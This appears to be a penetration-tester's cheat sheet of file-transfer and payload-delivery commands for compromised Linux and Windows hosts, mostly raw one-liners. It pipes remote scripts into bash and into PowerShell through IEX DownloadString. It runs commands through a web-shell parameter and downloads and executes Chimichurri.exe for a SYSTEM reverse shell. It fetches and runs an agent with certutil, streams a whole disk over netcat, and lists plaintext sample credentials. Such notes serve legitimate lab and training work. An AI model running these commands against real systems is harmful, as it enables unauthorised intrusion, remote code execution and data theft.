Transfer Files

More

Curl

vim script.py
python -m SimpleHTTPServer 80                     ..share
curl http://10.x.x.x:80/script.py -o /opt/tmp.py  ..d/l overwrite
curl $MyIP:80/LinEnum.sh | bash                   ..d/l execute (linux)

curl --user david:Nowonly4me http://10.x.x.x/~david/
curl --user david:Nowonly4me --negotiate http://10.x.x.x/~david/

smbserver

  • Share from Linux SMB to Windows

locate smbserver.py                             ..find
cd /usr/share/doc/python3-impacket/examples     ..prep
sudo python3 ./smbserver.py share /tmp          ..share
impacket-smbserver share `pwd`                  ..another method
smbclient -L 10.x.x.x --no-pass                 ..test

net view \\10.x.x.x                             ..windows command
net use z: \\10.x.x.x\pub                       ..map a drive
copy "Oracle Issue.txt" z:                      ..copy file
dir \\10.x.x.x\share                            ..windows list directory
copy \\10.x.x.x\share\app C:\Windows\Temp\      ..windows copy
\\10.x.x.x\share\reverse.exe                    ..run

Windows Share

  • Linux: Copy to Windows Share

smbclient //10.x.x.x/sharename -U domain/username
  • Linux: Mount Windows Share

mkdir /mnt/smbshare
sudo mount -t cifs //serverfs/c$ -o username=bob,password=xyz /mnt/smbshare
cd /mnt/smbshare
  • Windows: Copy to Windows Share

copy exploit.exe \\10.x.x.x\users\bob

HTTP Server One Liners

> python2 -m SimpleHTTPServer 80
> python3 -m http.server 80

> php -S localhost:80 -t evil/

> while true; do nc -l 80 < test.html; done

> ncat -k -l -p 80 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html"

> perl -MIO::All -e 'io(":80")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'

> ruby -run -e httpd . -p 80

From inetd.conf:
> 80 stream tcp nowait nobody cat cat /somefile
... where /somefile has the HTTP response line, headers and body

Powershell

----------------------
powershell.exe "(New-Object System.Net.WebClient).Downloadfile('http://$MyIP:8000/myfile','myfile')"

----------------------
echo IEX(New-Object Net.WebClient).DownloadString('http://<ip>:<port>/Sherlock.ps1') | powershell -noprofile

----------------------
echo $WebClient = New-Object System.Net.WebClient > wget.ps1
echo $WebClient.DownloadFile($Args[0],$Args[1]) >>  wget.ps1
powershell -ExecutionPolicy Bypass -File wget.ps1 http://$MyIP:8000/file.exe file.exe

----------------------
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=echo IES(New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/PowerUp.ps1')|powershell -noprofile

Powershell Advanced

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp

echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1

Chimichurri.exe 10.10.14.x 5555
nc -nvlp 5555
connected ..system!!

smb setup issues

------------------------
Install Attempts:

python --version
python3 --version
apt-get install python3.6-dev libmysqlclient-dev
pip install --upgrade setuptools --user python
sudo apt-get install libpcap-dev libpq-dev
pip3 install --upgrade setuptools --user python
cd /opt/impacket
sudo -i
git clone https://github.com/SecureAuthCorp/impacket.git
pip install .
pip3 install .
python3 -m pip install -U pip
python3 -m pip install -U setuptools
pip install impacket
pip3 install impacket

smb setup impacket python2

Install the old pip (unofficial way)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py

PATH=/home/kali/.local/bin:$PATH     ..update PATH manually

pip --version                        ..confirm v2 not v3
pip 20.3.4 from /home/kali/.local/lib/python2.7/site-packages/pip (python 2.7)

pip install --upgrade setuptools
pip install impacket

smb optional

> impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami

nc

Easy:

nc -lp 4444 > out.file
nc -w 3 DestIP 4444 < out.file


Faster:

nc -lp 4444 | uncompress -c | tar xvfp -
tar cfp - /some/dir | compress -c | nc -w 3 DestIP 4444


Whole Hard Drive:

dd if=/dev/hda3 | gzip -9 | nc -l 3333
nc DestIP 3333 | pv -b > hdImage.img.gz

updog

updog
updog -p 4444 --ssl
updog -d /tmp --password mypax

ftp

linux:
pip install pyftpdlib
python -m pyftpdlib -w
python3 -m pyftpdlib -p 21 -u mike -P paxx
 
windows:
ftp
open $MyIP
user mike passwurd
passive
put localfilename remotefilename
bye

ftp -n < ftpcommands.txt   ..optional

Permission Trouble

  • You may have a permissions problem

  • Save and execute from the Temp folder!

cd C:\Windows\Temp\
copy \\10.x.x.x\share\myapp.exe .
myapp.exe

certutil

  • You can download files on Windows with this tool

  • REF: bountyHTB

rs.Exec("certutil -urlcache -split -f http://10.x.x.x/agent.exe C:\\users\\public\\agent.exe")
rs.Exec("cmd /c C:\users\public\agent.exe")   ..execute
http://10.x.x.x/UploadedFiles/web.config      ..execute

Last updated